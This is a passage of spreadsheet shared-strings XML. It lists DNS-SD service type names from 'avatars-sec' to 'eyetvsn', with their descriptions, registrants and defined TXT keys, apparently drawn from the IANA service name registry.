    <t>Libravatar federated avatar hosting service.</t>
  </si>
  <si>
    <t>[libravatar_org]</t>
  </si>
  <si>
    <t>[Francois_Marier]</t>
  </si>
  <si>
    <t>avatars-sec</t>
  </si>
  <si>
    <t>axis-nvr</t>
  </si>
  <si>
    <t>Axis Network Video Recorders</t>
  </si>
  <si>
    <t>[Axis_Communications_AB]</t>
  </si>
  <si>
    <t>[Erik_Linge]</t>
  </si>
  <si>
    <t>axis-video</t>
  </si>
  <si>
    <t>Axis Video Cameras</t>
  </si>
  <si>
    <t>[Kristina_Sten]</t>
  </si>
  <si>
    <t>autotunnel</t>
  </si>
  <si>
    <t>IPSEC VPN tunnel over UDP</t>
  </si>
  <si>
    <t>[RFC6281]</t>
  </si>
  <si>
    <t>Defined TXT Keys: None</t>
  </si>
  <si>
    <t>b3d-convince</t>
  </si>
  <si>
    <t>3M Unitek Digital Orthodontic System</t>
  </si>
  <si>
    <t>[Rajiv_Aaron_Manglani]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers=1, protovers=&lt;api version&gt;, guid=&lt;32 hex digits&gt;</t>
  </si>
  <si>
    <t>babyphone</t>
  </si>
  <si>
    <t>BabyPhone</t>
  </si>
  <si>
    <t>[Johan_Kool]</t>
  </si>
  <si>
    <t>bandhelper-rc</t>
  </si>
  <si>
    <t>Remote Control for BandHelper app</t>
  </si>
  <si>
    <t>[Arlo_Leach]</t>
  </si>
  <si>
    <t>bandhelper-ss</t>
  </si>
  <si>
    <t>Screen sharing for BandHelper app</t>
  </si>
  <si>
    <t>barroomcomedy</t>
  </si>
  <si>
    <t>Peer to peer file sharing for a media player application</t>
  </si>
  <si>
    <t>[Fred_Zimmerman]</t>
  </si>
  <si>
    <t>bcloud-server</t>
  </si>
  <si>
    <t>Buddycloud Server Delegation</t>
  </si>
  <si>
    <t>[buddycloud]</t>
  </si>
  <si>
    <t>[Simon_Tennant_2]</t>
  </si>
  <si>
    <t>Defined TXT keys: v, host</t>
  </si>
  <si>
    <t>bdsk</t>
  </si>
  <si>
    <t>BibDesk Sharing</t>
  </si>
  <si>
    <t>[Adam_Maxwell]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, authenticate</t>
  </si>
  <si>
    <t>beacon</t>
  </si>
  <si>
    <t>Beacon Remote Service</t>
  </si>
  <si>
    <t>[Jeffrey_Sadeli]</t>
  </si>
  <si>
    <t>Defined TXT keys: version=&lt;product version&gt;, company=&lt;product company&gt;</t>
  </si>
  <si>
    <t>beamer</t>
  </si>
  <si>
    <t>Beamer Data Sharing Protocol</t>
  </si>
  <si>
    <t>[Frank_Szczerba]</t>
  </si>
  <si>
    <t>beatpack</t>
  </si>
  <si>
    <t>BeatPack Synchronization Server for BeatMaker</t>
  </si>
  <si>
    <t>[Mathieu_Garcia]</t>
  </si>
  <si>
    <t>beatsdirect</t>
  </si>
  <si>
    <t>Beats Direct allows for the discovery and control of devices</t>
  </si>
  <si>
    <t>[Beats_Electronics_LLC]</t>
  </si>
  <si>
    <t>[Eddie_Borjas]</t>
  </si>
  <si>
    <t>beep</t>
  </si>
  <si>
    <t>Xgrid Technology Preview</t>
  </si>
  <si>
    <t>[David_Kramer_2]</t>
  </si>
  <si>
    <t>behnke-cc</t>
  </si>
  <si>
    <t>Behnke doorphones / emergency phones</t>
  </si>
  <si>
    <t>[Telefonbau_Behnke_GmbH]</t>
  </si>
  <si>
    <t>[Thomas_Kraemer]</t>
  </si>
  <si>
    <t>bender</t>
  </si>
  <si>
    <t>Bender Communication Protocol</t>
  </si>
  <si>
    <t>[Bender_GmbH_Co_KG]</t>
  </si>
  <si>
    <t>[Markus_Kremer]</t>
  </si>
  <si>
    <t>Defined TXT keys: product version bus id featuremask</t>
  </si>
  <si>
    <t>bfagent</t>
  </si>
  <si>
    <t>BuildForge Agent</t>
  </si>
  <si>
    <t>[Joe_Senner_2]</t>
  </si>
  <si>
    <t>bigbangchess</t>
  </si>
  <si>
    <t>Big Bang Chess</t>
  </si>
  <si>
    <t>[Freeverse_Software]</t>
  </si>
  <si>
    <t>bigbangmancala</t>
  </si>
  <si>
    <t>Big Bang Mancala</t>
  </si>
  <si>
    <t>bitflit</t>
  </si>
  <si>
    <t>Data transfer service</t>
  </si>
  <si>
    <t>[Ramesh_Gupta]</t>
  </si>
  <si>
    <t>Defined TXT keys: provider, vendor, user, host, deploy, prototype, schedule</t>
  </si>
  <si>
    <t>bittorrent</t>
  </si>
  <si>
    <t>BitTorrent Zeroconf Peer Discovery Protocol</t>
  </si>
  <si>
    <t>[Robin_Perkins]</t>
  </si>
  <si>
    <t>blackbook</t>
  </si>
  <si>
    <t>Little Black Book Information Exchange Protocol</t>
  </si>
  <si>
    <t>[David_HM_Spector][Paul_M_Franceus]</t>
  </si>
  <si>
    <t>Defined TXT keys:   product=&lt;application name&gt;
  description=&lt;application description name&gt;
  version=&lt;application version/build number&gt;
  protovers=&lt;version of protocol in use by by this application&gt;</t>
  </si>
  <si>
    <t>bluevertise</t>
  </si>
  <si>
    <t>BlueVertise Network Protocol (BNP)</t>
  </si>
  <si>
    <t>[Fabrizio_Guglielmino]</t>
  </si>
  <si>
    <t>Defined TXT keys: role=&lt;master or slave&gt;</t>
  </si>
  <si>
    <t>boardplus</t>
  </si>
  <si>
    <t>board plus application transfer protocol</t>
  </si>
  <si>
    <t>[CX5_SOFTWARE]</t>
  </si>
  <si>
    <t>[Yohei_Yoshihara]</t>
  </si>
  <si>
    <t>booked-sync</t>
  </si>
  <si>
    <t>Booked communication protocol - Sharing And Sync Service</t>
  </si>
  <si>
    <t>[SÃ¶ren_Havemester]</t>
  </si>
  <si>
    <t>Defined TXT keys: Edition, Version, Public Shares, Machine ID, Machine Name</t>
  </si>
  <si>
    <t>bookworm</t>
  </si>
  <si>
    <t>Bookworm Client Discovery</t>
  </si>
  <si>
    <t>[Arne_Dirks]</t>
  </si>
  <si>
    <t>Defined TXT keys: flavors</t>
  </si>
  <si>
    <t>boundaryscan</t>
  </si>
  <si>
    <t>Proprietary</t>
  </si>
  <si>
    <t>[Uwe_Ziegler]</t>
  </si>
  <si>
    <t>Defined TXT keys: blocked=&lt;name of the device&gt;, version=&lt;firmware/instrument controller version&gt;</t>
  </si>
  <si>
    <t>bousg</t>
  </si>
  <si>
    <t>Bag Of Unusual Strategy Games</t>
  </si>
  <si>
    <t>boutfitness</t>
  </si>
  <si>
    <t>Bout Fitness Synchronization Service</t>
  </si>
  <si>
    <t>[Bout_Fitness_LLC]</t>
  </si>
  <si>
    <t>[Jesse_Curry]</t>
  </si>
  <si>
    <t>boxraysrvr</t>
  </si>
  <si>
    <t>Boxray Devices Host Server</t>
  </si>
  <si>
    <t>[Caprice_Productions]</t>
  </si>
  <si>
    <t>[Lance_Drake]</t>
  </si>
  <si>
    <t>bq-cromo</t>
  </si>
  <si>
    <t>bq Cromo protocol</t>
  </si>
  <si>
    <t>[MUNDO_READER_SL]</t>
  </si>
  <si>
    <t>[Adan_Munoz]</t>
  </si>
  <si>
    <t>breas</t>
  </si>
  <si>
    <t>Breas</t>
  </si>
  <si>
    <t>[Breas_Medical_AB]</t>
  </si>
  <si>
    <t>[Jonas_Sjostedt]</t>
  </si>
  <si>
    <t>bri</t>
  </si>
  <si>
    <t>RFID Reader Basic Reader Interface</t>
  </si>
  <si>
    <t>[Thaddeus_Ternes]</t>
  </si>
  <si>
    <t>bridgeprotocol</t>
  </si>
  <si>
    <t>JSON RPC Bridge Protocol</t>
  </si>
  <si>
    <t>[Michel_Stam_2]</t>
  </si>
  <si>
    <t>Defined TXT keys:  path, version</t>
  </si>
  <si>
    <t>brski-proxy</t>
  </si>
  <si>
    <t>The Bootstrapping Remote Secure Key Infrastructures Proxy</t>
  </si>
  <si>
    <t>[RFC-ietf-anima-bootstrapping-keyinfra-41]</t>
  </si>
  <si>
    <t>brski-registrar</t>
  </si>
  <si>
    <t>The Bootstrapping Remote Secure Key Infrastructures Registrar</t>
  </si>
  <si>
    <t>bsqdea</t>
  </si>
  <si>
    <t>Backup Simplicity</t>
  </si>
  <si>
    <t>[Qdea]</t>
  </si>
  <si>
    <t>btp</t>
  </si>
  <si>
    <t>Beats Transfer Protocol allows for the discovery and control of devices</t>
  </si>
  <si>
    <t>[Beats_Electronics_LLC_2]</t>
  </si>
  <si>
    <t>[Yunho_Huh]</t>
  </si>
  <si>
    <t>buddycloud-api</t>
  </si>
  <si>
    <t>buddycloud API</t>
  </si>
  <si>
    <t>[Simon_Tennant]</t>
  </si>
  <si>
    <t>Defined TXT keys: v, host, protocol, path, port</t>
  </si>
  <si>
    <t>buzzer</t>
  </si>
  <si>
    <t>Service for opening electric doors</t>
  </si>
  <si>
    <t>[Mnemo.ai]</t>
  </si>
  <si>
    <t>[Arturo_Falck]</t>
  </si>
  <si>
    <t>caldav</t>
  </si>
  <si>
    <t>Calendaring Extensions to WebDAV (CalDAV) - non-TLS</t>
  </si>
  <si>
    <t>[RFC6764]</t>
  </si>
  <si>
    <t>This is an extension of the http service.  Defined TXT keys: path=&lt;context path&gt;</t>
  </si>
  <si>
    <t>caldavs</t>
  </si>
  <si>
    <t>Calendaring Extensions to WebDAV (CalDAV) - over TLS</t>
  </si>
  <si>
    <t>This is an extension of the https service.  Defined TXT keys: path=&lt;context path&gt;</t>
  </si>
  <si>
    <t>caltalk</t>
  </si>
  <si>
    <t>CalTalk</t>
  </si>
  <si>
    <t>[Joe_Groff]</t>
  </si>
  <si>
    <t>canon-chmp</t>
  </si>
  <si>
    <t>Canon HTTP Management Protocol</t>
  </si>
  <si>
    <t>[Canon_Inc_3]</t>
  </si>
  <si>
    <t>[Tomoyuki_Hansaki]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, mpath</t>
  </si>
  <si>
    <t>carddav</t>
  </si>
  <si>
    <t>vCard Extensions to WebDAV (CardDAV) - non-TLS</t>
  </si>
  <si>
    <t>[RFC6352]</t>
  </si>
  <si>
    <t>carddavs</t>
  </si>
  <si>
    <t>vCard Extensions to WebDAV (CardDAV) - over TLS</t>
  </si>
  <si>
    <t>cardsend</t>
  </si>
  <si>
    <t>Card Send Protocol</t>
  </si>
  <si>
    <t>[Jeff_Grossman]</t>
  </si>
  <si>
    <t>carousel</t>
  </si>
  <si>
    <t>Carousel Player Protocol</t>
  </si>
  <si>
    <t>[Tightrope_Media_Systems]</t>
  </si>
  <si>
    <t>[Scott_Jann]</t>
  </si>
  <si>
    <t>cctv</t>
  </si>
  <si>
    <t>IP and Closed-Circuit Television for Securitiy applications</t>
  </si>
  <si>
    <t>[Frank_Rottmann]</t>
  </si>
  <si>
    <t>Defined TXT keys: u=&lt;username&gt;, p=&lt;password&gt;, path=&lt;path to XML file&gt;</t>
  </si>
  <si>
    <t>cerebra</t>
  </si>
  <si>
    <t>Control the Cerebra Aquarium Controller</t>
  </si>
  <si>
    <t>[Vertex_Technologies_Inc]</t>
  </si>
  <si>
    <t>[Christopher_Schlacta]</t>
  </si>
  <si>
    <t>certificates</t>
  </si>
  <si>
    <t>Server for S/MIME and PGP certificates</t>
  </si>
  <si>
    <t>[John_Levine]</t>
  </si>
  <si>
    <t>[draft-bhjl-x509-srv-01]</t>
  </si>
  <si>
    <t>cheat</t>
  </si>
  <si>
    <t>The Cheat</t>
  </si>
  <si>
    <t>[Chaz_McGarvey]</t>
  </si>
  <si>
    <t>chess</t>
  </si>
  <si>
    <t>Project Gridlock</t>
  </si>
  <si>
    <t>chfts</t>
  </si>
  <si>
    <t>Fluid Theme Server</t>
  </si>
  <si>
    <t>chili</t>
  </si>
  <si>
    <t>The CHILI Radiology System</t>
  </si>
  <si>
    <t>[Andre_Schroter]</t>
  </si>
  <si>
    <t>ciao</t>
  </si>
  <si>
    <t>Ciao Arduino Protocol</t>
  </si>
  <si>
    <t>[Mike_Colagrosso]</t>
  </si>
  <si>
    <t>Defined TXT keys: see www.ciaoapp.com</t>
  </si>
  <si>
    <t>cip4discovery</t>
  </si>
  <si>
    <t>Discovery of JDF (CIP4 Job Definition Format) enabled devices</t>
  </si>
  <si>
    <t>[Stefan_Daun]</t>
  </si>
  <si>
    <t>clipboard</t>
  </si>
  <si>
    <t>Clipboard Sharing</t>
  </si>
  <si>
    <t>clique</t>
  </si>
  <si>
    <t>Clique Link-Local Multicast Chat Room</t>
  </si>
  <si>
    <t>[Telepathy_project]</t>
  </si>
  <si>
    <t>Defined TXT keys: see http://telepathy.freedesktop.org/xmpp/clique</t>
  </si>
  <si>
    <t>clscts</t>
  </si>
  <si>
    <t>Oracle CLS Cluster Topology Service</t>
  </si>
  <si>
    <t>[David_Brower]</t>
  </si>
  <si>
    <t>collection</t>
  </si>
  <si>
    <t>Published Collection Object</t>
  </si>
  <si>
    <t>[Brady_Anderson]</t>
  </si>
  <si>
    <t>Defined TXT keys: version=?</t>
  </si>
  <si>
    <t>commfort</t>
  </si>
  <si>
    <t>A client-server chat for LAN or Internet with video chat support</t>
  </si>
  <si>
    <t>[CommFort_software_Ltd.]</t>
  </si>
  <si>
    <t>[Maxim_Mirgorodsky]</t>
  </si>
  <si>
    <t>Defined TXT keys: commfort, chat, communications, client-server, 
      local chat, LAN, network, voice chat, video chat, video communication, 
      video conference, file transfer</t>
  </si>
  <si>
    <t>com-ocs-es-mcc</t>
  </si>
  <si>
    <t>ElectraStar media centre control protocol</t>
  </si>
  <si>
    <t>[OC]</t>
  </si>
  <si>
    <t>conecube</t>
  </si>
  <si>
    <t>DNS SRV service for smarthome server</t>
  </si>
  <si>
    <t>[cone_smart_solution]</t>
  </si>
  <si>
    <t>[Christoph_Bimminger]</t>
  </si>
  <si>
    <t>contactserver</t>
  </si>
  <si>
    <t>Now Contact</t>
  </si>
  <si>
    <t>convert</t>
  </si>
  <si>
    <t>0-RTT TCP Convert Protocol</t>
  </si>
  <si>
    <t>[RFC-ietf-tcpm-converters-19]</t>
  </si>
  <si>
    <t>coolanetaudio</t>
  </si>
  <si>
    <t>Coolatoola Network Audio</t>
  </si>
  <si>
    <t>[Coolatoola.com]</t>
  </si>
  <si>
    <t>[Tim_Hewett]</t>
  </si>
  <si>
    <t>corroboree</t>
  </si>
  <si>
    <t>Corroboree Server</t>
  </si>
  <si>
    <t>[Heath_Raftery]</t>
  </si>
  <si>
    <t>coviot</t>
  </si>
  <si>
    <t>Service for coviot branded devices</t>
  </si>
  <si>
    <t>[Coviot]</t>
  </si>
  <si>
    <t>[Adnan_Senyurt]</t>
  </si>
  <si>
    <t>Defined TXT keys: FW_VERSION, PROTOCOL_VERSION, SERVICE_DESCRIPTION</t>
  </si>
  <si>
    <t>cpnotebook2</t>
  </si>
  <si>
    <t>NoteBook 2</t>
  </si>
  <si>
    <t>[Circus_Ponies_Suppor]</t>
  </si>
  <si>
    <t>csi-mmws</t>
  </si>
  <si>
    <t>Canfield Scientific Inc - Mirror Mobile Web Services</t>
  </si>
  <si>
    <t>[Canfield_Scientific_Inc]</t>
  </si>
  <si>
    <t>[James_Crismale]</t>
  </si>
  <si>
    <t>Defined TXT keys:  path</t>
  </si>
  <si>
    <t>cw-codetap</t>
  </si>
  <si>
    <t>CodeWarrior HTI Xscale PowerTAP</t>
  </si>
  <si>
    <t>[Ted_Woodward]</t>
  </si>
  <si>
    <t>cw-dpitap</t>
  </si>
  <si>
    <t>CodeWarrior HTI DPI PowerTAP</t>
  </si>
  <si>
    <t>cw-oncetap</t>
  </si>
  <si>
    <t>CodeWarrior HTI OnCE PowerTAP</t>
  </si>
  <si>
    <t>cw-powertap</t>
  </si>
  <si>
    <t>CodeWarrior HTI COP PowerTAP</t>
  </si>
  <si>
    <t>cytv</t>
  </si>
  <si>
    <t>CyTV - Network streaming for Elgato EyeTV</t>
  </si>
  <si>
    <t>[Andreas_Junghans]</t>
  </si>
  <si>
    <t>dacp</t>
  </si>
  <si>
    <t>Digital Audio Control Protocol (iTunes)</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, Ver, DbId</t>
  </si>
  <si>
    <t>dancepartner</t>
  </si>
  <si>
    <t>Dance partner application for iPhone</t>
  </si>
  <si>
    <t>[Rory_McClure]</t>
  </si>
  <si>
    <t>darkhorsetimer</t>
  </si>
  <si>
    <t>Timer LAN service</t>
  </si>
  <si>
    <t>[Dark_Horse_GmbH_Co_KG]</t>
  </si>
  <si>
    <t>[Ludwig_Kannicht]</t>
  </si>
  <si>
    <t>dataturbine</t>
  </si>
  <si>
    <t>Open Source DataTurbine Streaming Data Middleware</t>
  </si>
  <si>
    <t>[Tony_Fountain]</t>
  </si>
  <si>
    <t>dbaudio</t>
  </si>
  <si>
    <t>d&amp;b audiotechnik remote network</t>
  </si>
  <si>
    <t>[d_b_audiotechnik]</t>
  </si>
  <si>
    <t>[Christian_Laendner]</t>
  </si>
  <si>
    <t>Defined TXT keys:txtvers=&lt;TXT-Record version&gt;
protovers=&lt;version of proprietary protocol&gt;
guid=&lt;type&gt;
name=&lt;name&gt;
sn=&lt;serial number&gt;
device=&lt;cleartext type&gt;
fwver=&lt;firmware version&gt;</t>
  </si>
  <si>
    <t>dccp-ping</t>
  </si>
  <si>
    <t>ping/traceroute using DCCP</t>
  </si>
  <si>
    <t>[Samuel_Jero]</t>
  </si>
  <si>
    <t>dell-soo-ds</t>
  </si>
  <si>
    <t>Spotlight on Oracle Diagnostic Server</t>
  </si>
  <si>
    <t>[Dell_2]</t>
  </si>
  <si>
    <t>[Rob_Griffin_3]</t>
  </si>
  <si>
    <t>dell-soss-ds-w</t>
  </si>
  <si>
    <t>Spotlight on SQL Server Diagnostic Server HTTP</t>
  </si>
  <si>
    <t>dell-ssms-ds</t>
  </si>
  <si>
    <t>Spotlight SSMS Plugin Diagnostic Server</t>
  </si>
  <si>
    <t>demoncamremote</t>
  </si>
  <si>
    <t>Peer-to-peer real-time video streaming</t>
  </si>
  <si>
    <t>[James_Alan_Bush]</t>
  </si>
  <si>
    <t>device-info</t>
  </si>
  <si>
    <t>Device Info</t>
  </si>
  <si>
    <t>[Stuart_Cheshire][Marc_Krochmal]</t>
  </si>
  <si>
    <t>Not a service type. Special name reserved for DNS-SD device info.</t>
  </si>
  <si>
    <t>devonsync</t>
  </si>
  <si>
    <t>DEVONthink synchronization protocol</t>
  </si>
  <si>
    <t>[DEVONtechnologies_LLC]</t>
  </si>
  <si>
    <t>[Rob_Rix][Eric_Boehnisch-Volkmann]</t>
  </si>
  <si>
    <t>Defined TXT keys: None at present</t>
  </si>
  <si>
    <t>dhanda-g</t>
  </si>
  <si>
    <t>DHANDAg is going for a site</t>
  </si>
  <si>
    <t>[DHANDAg]</t>
  </si>
  <si>
    <t>[Deepam]</t>
  </si>
  <si>
    <t>dictation</t>
  </si>
  <si>
    <t>Use of a dictation service by a hand-held device</t>
  </si>
  <si>
    <t>[Nuance_Communications_Inc]</t>
  </si>
  <si>
    <t>[Mark_Jackson]</t>
  </si>
  <si>
    <t>Defined TXT keys: ver, name</t>
  </si>
  <si>
    <t>difi</t>
  </si>
  <si>
    <t>EyeHome</t>
  </si>
  <si>
    <t>[Elgato]</t>
  </si>
  <si>
    <t>disconnect</t>
  </si>
  <si>
    <t>DisConnect Peer to Peer Game Protocol</t>
  </si>
  <si>
    <t>[Michael_S_Bogovich]</t>
  </si>
  <si>
    <t>displaysrc</t>
  </si>
  <si>
    <t>Wi-Fi Alliance Display Source service</t>
  </si>
  <si>
    <t>[Wi-Fi_Alliance_3]</t>
  </si>
  <si>
    <t>[Gaurav_Jain]</t>
  </si>
  <si>
    <t>dist-opencl</t>
  </si>
  <si>
    <t>Distributed OpenCL discovery protocol</t>
  </si>
  <si>
    <t>[William_Dillon]</t>
  </si>
  <si>
    <t>Defined TXT keys:  TCPendpoint, UDPendpoint, UUID</t>
  </si>
  <si>
    <t>ditrios</t>
  </si>
  <si>
    <t>Ditrios SOA Framework Protocol</t>
  </si>
  <si>
    <t>[Mark_Schmatz]</t>
  </si>
  <si>
    <t>Defined TXT keys: http://www.ditrios.org/index.php?link=tutorial/index#zeroconf</t>
  </si>
  <si>
    <t>divelogsync</t>
  </si>
  <si>
    <t>Dive Log Data Sharing and Synchronization Protocol</t>
  </si>
  <si>
    <t>[Greg_McLaughlin]</t>
  </si>
  <si>
    <t>dltimesync</t>
  </si>
  <si>
    <t>Local Area Dynamic Time Synchronisation Protocol</t>
  </si>
  <si>
    <t>[Geoff_Back_3]</t>
  </si>
  <si>
    <t>dns-llq-tls</t>
  </si>
  <si>
    <t>DNS Long-Lived Queries over TLS</t>
  </si>
  <si>
    <t>dns-push-tls</t>
  </si>
  <si>
    <t>DNS Push Notification Service Type</t>
  </si>
  <si>
    <t>[RFC8765, Section 6.1]</t>
  </si>
  <si>
    <t>dns-query-tls</t>
  </si>
  <si>
    <t>DNS queries to the authoritative server over TLS</t>
  </si>
  <si>
    <t>dns-sd</t>
  </si>
  <si>
    <t>DNS Service Discovery</t>
  </si>
  <si>
    <t>Not a service type. Special name reserved for DNS-SD meta queries.</t>
  </si>
  <si>
    <t>dns-update</t>
  </si>
  <si>
    <t>DNS Dynamic Update Service</t>
  </si>
  <si>
    <t>DNS Dynamic Update Service for a given domain may not necessarily be provided by
      the principal name servers as advertised by the domain's "NS" records, and may not
      necessarily always be provided on port 53. The "_dns-update._udp.&lt;domain&gt;." SRV record gives
      the target host and port where DNS Dynamic Update Service is provided for the named domain.</t>
  </si>
  <si>
    <t>DNS Dynamic Update Service for a given domain may not necessarily be provided by
the principal name servers as advertised by the domain's "NS" records, and may not
necessarily always be provided on port 53. The "_dns-update._udp.&lt;domain&gt;." SRV record gives
the target host and port where DNS Dynamic Update Service is provided for the named domain.</t>
  </si>
  <si>
    <t>dns-update-tls</t>
  </si>
  <si>
    <t>DNS Dynamic Update Service over TLS</t>
  </si>
  <si>
    <t>dop</t>
  </si>
  <si>
    <t>Roar (Death of Productivity)</t>
  </si>
  <si>
    <t>[Massive_Flow_Product]</t>
  </si>
  <si>
    <t>Defined TXT keys: name=&lt;full username&gt;</t>
  </si>
  <si>
    <t>dropcopy</t>
  </si>
  <si>
    <t>DropCopy</t>
  </si>
  <si>
    <t>[base_t_Interactive]</t>
  </si>
  <si>
    <t>dsgsync</t>
  </si>
  <si>
    <t>Datacolor SpyderGallery Desktop Sync Protocol</t>
  </si>
  <si>
    <t>[Datacolor]</t>
  </si>
  <si>
    <t>[Heath_Barber]</t>
  </si>
  <si>
    <t>dsl-sync</t>
  </si>
  <si>
    <t>Data Synchronization Protocol for Discovery Software products</t>
  </si>
  <si>
    <t>[John_Hogg]</t>
  </si>
  <si>
    <t>dtrmtdesktop</t>
  </si>
  <si>
    <t>Desktop Transporter Remote Desktop Protocol</t>
  </si>
  <si>
    <t>[Daniel_Stodle]</t>
  </si>
  <si>
    <t>duckrace</t>
  </si>
  <si>
    <t>A communication protocol that allows a school teacher to set work activities to students over a LAN.</t>
  </si>
  <si>
    <t>[Stinky_Kitten_Limited]</t>
  </si>
  <si>
    <t>[Gary_Atkinson]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers uuid devicename</t>
  </si>
  <si>
    <t>dxtgsync</t>
  </si>
  <si>
    <t>Documents To Go Desktop Sync Protocol</t>
  </si>
  <si>
    <t>[Tim_Boyle]</t>
  </si>
  <si>
    <t>ea-dttx-poker</t>
  </si>
  <si>
    <t>Protocol for EA Downtown Texas Hold 'em</t>
  </si>
  <si>
    <t>[Ben_Lewis]</t>
  </si>
  <si>
    <t>earphoria</t>
  </si>
  <si>
    <t>Earphoria</t>
  </si>
  <si>
    <t>[Rogue_Amoeba]</t>
  </si>
  <si>
    <t>easyspndlg-sync</t>
  </si>
  <si>
    <t>Sync service for the Easy Spend Log app</t>
  </si>
  <si>
    <t>[Aaron_L_Bratcher]</t>
  </si>
  <si>
    <t>eb-amuzi</t>
  </si>
  <si>
    <t>Amuzi peer-to-peer session synchronization protocol</t>
  </si>
  <si>
    <t>[Zachary_Gramana]</t>
  </si>
  <si>
    <t>eb-sync</t>
  </si>
  <si>
    <t>Easy Books App data sync helper for Mac OS X and iOS</t>
  </si>
  <si>
    <t>[Geode_Software_Ltd]</t>
  </si>
  <si>
    <t>[Mathew_Waters]</t>
  </si>
  <si>
    <t>ebms</t>
  </si>
  <si>
    <t>ebXML Messaging</t>
  </si>
  <si>
    <t>[Matthew_MacKenzie]</t>
  </si>
  <si>
    <t>Defined TXT keys: Endpoint=&lt;/path/to/endpoint&gt;</t>
  </si>
  <si>
    <t>ecms</t>
  </si>
  <si>
    <t>Northrup Grumman/Mission Systems/ESL Data Flow Protocol</t>
  </si>
  <si>
    <t>[Dan_Goff]</t>
  </si>
  <si>
    <t>ebreg</t>
  </si>
  <si>
    <t>ebXML Registry</t>
  </si>
  <si>
    <t>Defined TXT keys: HttpBinding=&lt;/path/to/registry/http/binding&gt;</t>
  </si>
  <si>
    <t>ecbyesfsgksc</t>
  </si>
  <si>
    <t>Net Monitor Anti-Piracy Service</t>
  </si>
  <si>
    <t>[Guy_Meyer]</t>
  </si>
  <si>
    <t>edcp</t>
  </si>
  <si>
    <t>LaCie Ethernet Disk Configuration Protocol</t>
  </si>
  <si>
    <t>[Nicolas_Bouilleaud]</t>
  </si>
  <si>
    <t>Defined TXT keys: ip, mac, dhcp, mask, gtwy, wins, name, version</t>
  </si>
  <si>
    <t>edge1</t>
  </si>
  <si>
    <t>Edge1 Base Station</t>
  </si>
  <si>
    <t>[Skycatch_Inc.]</t>
  </si>
  <si>
    <t>[Ruben_Beltran_del_Rio_3]</t>
  </si>
  <si>
    <t>edsservice</t>
  </si>
  <si>
    <t>Provides resolution of EDS services available on a given network</t>
  </si>
  <si>
    <t>[Morpho_Detection_LLC]</t>
  </si>
  <si>
    <t>[Natarajan_Subramanian]</t>
  </si>
  <si>
    <t>eeg</t>
  </si>
  <si>
    <t>EEG System Discovery across local and wide area networks</t>
  </si>
  <si>
    <t>[Shifted_Current]</t>
  </si>
  <si>
    <t>[Joel_Aaron_Clipperton]</t>
  </si>
  <si>
    <t>Defined TXT keys:  Type</t>
  </si>
  <si>
    <t>efkon-elite</t>
  </si>
  <si>
    <t>EFKON Lightweight Interface to Traffic Events</t>
  </si>
  <si>
    <t>[EFKON_AG]</t>
  </si>
  <si>
    <t>[Thomas_Kemmer]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, protovers, model, serial, scheme, path</t>
  </si>
  <si>
    <t>egistix</t>
  </si>
  <si>
    <t>Egistix Auto-Discovery</t>
  </si>
  <si>
    <t>[Dave_Lindquist_2]</t>
  </si>
  <si>
    <t>eheap</t>
  </si>
  <si>
    <t>Interactive Room Software Infrastructure (Event Sharing)</t>
  </si>
  <si>
    <t>embrace</t>
  </si>
  <si>
    <t>DataEnvoy</t>
  </si>
  <si>
    <t>[Rob_MacGregor]</t>
  </si>
  <si>
    <t>enphase-envoy</t>
  </si>
  <si>
    <t>Enphase Energy Envoy</t>
  </si>
  <si>
    <t>[Enphase_Energy_Inc]</t>
  </si>
  <si>
    <t>[Chris_Eich]</t>
  </si>
  <si>
    <t>Defined TXT keys: - txtvers
      - protovers
      - serialnum</t>
  </si>
  <si>
    <t>ep</t>
  </si>
  <si>
    <t>Endpoint Protocol (EP) for use in Home Automation systems</t>
  </si>
  <si>
    <t>[Tommy_van_der_Vorst]</t>
  </si>
  <si>
    <t>Defined TXT keys: dns-sd_mdns</t>
  </si>
  <si>
    <t>esp</t>
  </si>
  <si>
    <t>Extensis Server Protocol</t>
  </si>
  <si>
    <t>[Loren_Barr]</t>
  </si>
  <si>
    <t>est</t>
  </si>
  <si>
    <t>Enrollment Over Secure Transport</t>
  </si>
  <si>
    <t>[Jack_Visoky]</t>
  </si>
  <si>
    <t>[RFC7030]. Defined TXT keys: none</t>
  </si>
  <si>
    <t>eucalyptus</t>
  </si>
  <si>
    <t>Eucalyptus Discovery</t>
  </si>
  <si>
    <t>[Support_Team]</t>
  </si>
  <si>
    <t>Defined TXT keys: Eucalyptus-DNS-SD</t>
  </si>
  <si>
    <t>eventserver</t>
  </si>
  <si>
    <t>Now Up-to-Date</t>
  </si>
  <si>
    <t>evp</t>
  </si>
  <si>
    <t>EvP - Generic EVENT protocol</t>
  </si>
  <si>
    <t>[Quentin_Glidic]</t>
  </si>
  <si>
    <t>evs-notif</t>
  </si>
  <si>
    <t>EVS Notification Center Protocol</t>
  </si>
  <si>
    <t>[Eric_Gillet]</t>
  </si>
  <si>
    <t>Defined TXT keys: ID, Address</t>
  </si>
  <si>
    <t>ewalletsync</t>
  </si>
  <si>
    <t>Synchronization Protocol for Ilium Software's eWallet</t>
  </si>
  <si>
    <t>[Dan_Amstutz]</t>
  </si>
  <si>
    <t>Defined TXT keys: name=&lt;friendly device name&gt;</t>
  </si>
  <si>
    <t>ewelink</t>
  </si>
  <si>
    <t>eWeLink devices supporting LAN Control</t>
  </si>
  <si>
    <t>[Shenzhen_CoolKit_Technology_Co._Ltd.]</t>
  </si>
  <si>
    <t>[Michael_Hu]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, id, type, apivers, encrypt, data1, data2, data3, data4, iv</t>
  </si>
  <si>
    <t>example</t>
  </si>
  <si>
    <t>Example Service Type</t>
  </si>
  <si>
    <t>Not a real service type.
Special 'pretend' service types ("_example._udp" and "_example._tcp")
reserved for use in illustrative examples in books and other documentation.</t>
  </si>
  <si>
    <t>exb</t>
  </si>
  <si>
    <t>Exbiblio Cascading Service Protocol</t>
  </si>
  <si>
    <t>[Claes_Fredrik_Mannby]</t>
  </si>
  <si>
    <t>Defined TXT keys: Will be described at www.exbiblio.com</t>
  </si>
  <si>
    <t>extensissn</t>
  </si>
  <si>
    <t>Extensis Serial Number</t>
  </si>
  <si>
    <t>[Extensis]</t>
  </si>
  <si>
    <t>eyetvsn</t>
  </si>
  <si>
